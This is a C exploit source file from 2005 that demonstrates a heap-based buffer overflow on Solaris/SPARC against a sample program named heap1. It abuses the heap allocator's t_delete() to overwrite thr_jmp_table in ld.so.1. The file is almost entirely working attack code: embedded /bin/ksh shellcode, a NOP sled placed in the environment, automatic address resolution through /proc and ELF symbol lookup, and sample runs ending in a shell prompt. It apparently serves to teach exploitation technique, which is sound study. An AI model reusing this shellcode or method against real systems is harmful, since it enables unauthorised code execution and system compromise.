/*
 * $Id: heap1-ex4.c,v 1.1 2005/03/02 21:00:52 raptor Exp $
 *
 * heap1-ex4.c - heap1.c exploit (Solaris/SPARC heap-based)
 * Copyright (c) 2005 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit shows the basic heap-based buffer overflow exploitation
 * technique, abusing the function t_delete() of the Solaris System V
 * heap implementation. The special shellcode with the branch ahead of
 * 0x404 bytes (to avoid nulls in the opcode) is stuck into the envp.
 * The target for overwrite is the thr_jmp_table within /usr/lib/ld.so.1.
 *
 * All needed addresses within envp and ld.so are calculated automagically
 * (thanks to inode <inode@wayreth.eu.org> for his interesting research) and
 * to KF <dotslash@globalintersec.com> for giving me access to his Solaris
 * 10 box.
 *
 * bash-2.03$ uname -a
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * bash-2.03$ gcc heap1-ex4.c -o heap1-ex4 -lelf -Wall
 * bash-2.03$ ./heap1-ex4
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.8)
 * Using stack base        : 0xffbefffc
 * Using ld.so base        : 0xff3b0000
 * Using ld.so offset      : 0x321b4
 * Using thr_jmp_table     : 0xff3e21b4
 * Using ret address       : 0xffbefb9c
 * 
 * $ 
 *
 * bash-2.05b$ uname -a
 * SunOS ims0 5.10 s10_63 sun4u sparc SUNW,Ultra-4
 * bash-2.05b$ gcc heap1-ex4.c -o heap1-ex4 -lelf -Wall
 * bash-2.05b$ ./heap1-ex4
 * Using SI_PLATFORM       : SUNW,Ultra-4 (5.10)
 * Using stack base        : 0xffbffffc
 * Using ld.so base        : 0xff3b0000
 * Using ld.so offset      : 0x3a234
 * Using thr_jmp_table     : 0xff3ea234
 * Using ret address       : 0xffbffba4
 * 
 * $ 
 */

#include <fcntl.h>
#include <gelf.h>
#include <libelf.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	VULN		"./heap1"	// the vulnerable program
#define	BUFSIZE		113		// evil buffer size (64 + 48 + 1)
#define	NOP		0x801c4011	// Solaris/SPARC nop equivalent
#define	FAKE_SIZE	0xfffffff0	// the lower two bits must be 0
#define	FAKE_LEFT	0xffffffff	// -1 for ISNOTREE() to be true

/* as a side note, NOP may also be 0x90909090 ;) */

/* voodoo macros */
#define VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char jmp[] = /* branch 0x404 bytes ahead (4 bytes) */
"\x10\x80\x01\x01";

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* globals */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_arg(char *string);
int	add_env(char *string);
void	pad_arg(void);
int	search_ldso_base(int rel);
int	search_ldso_offset(char *symbol);
void	set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], ssc[strlen(sc) + strlen(jmp) + 1024 + 1];
	char	platform[256], release[256];
	char	*p;

	int	i, rel, offset, plat_len, prog_len;
	int	ldso_base, ldso_offset, ret, retloc;

	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* get thr_jmp_table address */
	ldso_base = search_ldso_base(rel);
	ldso_offset = search_ldso_offset("thr_jmp_table");
	retloc = ldso_base + ldso_offset;

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* build the special shellcode */
	memset(ssc, 'A', sizeof(ssc));
	ssc[sizeof(ssc) - 1] = 0x0;
	/* nop sled */
	for (i = 0; i < sizeof(ssc); i += 4)
		set_val(ssc, i, NOP);
	/* branch opcode and shellcode */
	memcpy(ssc, jmp, 4);
	memcpy(ssc + 1024 + 4, sc, strlen(sc));

	/* put the shellcode in envp, keeping padding */
	add_env(ssc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the retaddr in envp[0] */
	ret = sb - offset + arg_len;

	/* build the fake chunk */
	p = buf + 64;
	set_val(p, 0, FAKE_SIZE);
	set_val(p, 8, ret);
	set_val(p, 16, FAKE_LEFT);
	set_val(p, 32, retloc - 8);

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using ld.so base\t: 0x%p\n", (void *)ldso_base);
	fprintf(stderr, "Using ld.so offset\t: 0x%p\n", (void *)ldso_offset);
	fprintf(stderr, "Using thr_jmp_table\t: 0x%p\n", (void *)retloc);
	fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
	exit(0);
}

/*
 * add_arg(): add an argument to argv
 */
int add_arg(char * string)
{       
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg()
{
	int	pad;
	char	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * search_ldso_base(): search for the last non-writable (RX) memory segment
 * valid for all programs (ld.so.1 memory space base) using proc filesystem
 */
int search_ldso_base(int rel)
{
	int	fd;
	char	tmp[16];
	prmap_t	map;
	int	addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last non-writable memory segment (ld.so.1 base) */
	while (read(fd, &map, sizeof(map)))
		if ((map.pr_vaddr) && (map.pr_mflags == (MA_READ | MA_EXEC))) {
				addr_old = addr;
				addr = map.pr_vaddr;
		}
	close(fd);

	/* FIXME: on Solaris 10 ld.so.1 base is last - 1 */
	return(rel < 10 ? addr : addr_old);
}

/*
 * search_ldso_offset(): search for the offset of symbol within ld.so.1
 */
int search_ldso_offset(char *symbol)
{
	int		fd, i;
	char		*tmp;
	Elf		*elf_file;
	Elf_Data	*data;
	Elf_Scn		*scn;
	GElf_Ehdr	ehdr;
	GElf_Shdr	shdr;
	GElf_Sxword	cnt = 0;
	GElf_Sym	sym;

	/* initialize elf version */
	elf_version(EV_CURRENT);

	/* open ld.so.1 */
	if ((fd = open("/usr/lib/ld.so.1", O_RDONLY)) < 0) {
		fprintf(stderr, "can't open /usr/lib/ld.so.1\n");
		exit(1);
	}

	/* obtain an elf descriptor for ld.so.1 */
	if ((elf_file = elf_begin(fd, ELF_C_READ, (Elf *)NULL)) == NULL) {
		fprintf(stderr, "can't obtain elf descriptor\n");
		exit(1);
	}

	/* retrieve the elf header of ld.so.1 */
	if (gelf_getehdr(elf_file, &ehdr) == NULL) {
		fprintf(stderr, "can't retrieve elf header\n");
		exit(1);
	}

	/* get an elf section descriptor */
	if ((scn = elf_getscn(elf_file, ehdr.e_shstrndx)) == NULL) {
		fprintf(stderr, "can't get elf section descriptor\n");
		exit(1);
	}

	/* scan ld.so.1, searching for symbol within .symtab */
	scn = NULL;
	while((scn = elf_nextscn(elf_file, scn)) != NULL) {

		/* retrieve the elf section header */
		gelf_getshdr(scn, &shdr);

		if (shdr.sh_type == SHT_SYMTAB) {

			if (((data = elf_getdata(scn, NULL)) == NULL) ||
			    (data->d_size == 0)) {
				fprintf(stderr, "unable to find .symtab\n");
				exit(1);
			}

			cnt = shdr.sh_size / shdr.sh_entsize;

			/* search for symbol within .symtab */
			for (i = 1; i < cnt; i++) {
				gelf_getsym(data, i, &sym);

				if (sym.st_name == NULL)
					tmp = "";
				else
					tmp = (char *)elf_strptr(elf_file, 
					    shdr.sh_link, sym.st_name);

				/* if found, cleanup and return */
				if (!strcmp(symbol, tmp)) {
					elf_end(elf_file);
					close(fd);
					return(sym.st_value);
				}
			}
		}
	}

	/* if not found, exit */
	fprintf(stderr, "unable to find %s in /usr/lib/ld.so.1s\n", symbol);
	exit(1);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
        buf[pos] =      (val & 0xff000000) >> 24;
        buf[pos + 1] =  (val & 0x00ff0000) >> 16;
        buf[pos + 2] =  (val & 0x0000ff00) >> 8;
        buf[pos + 3] =  (val & 0x000000ff);
}
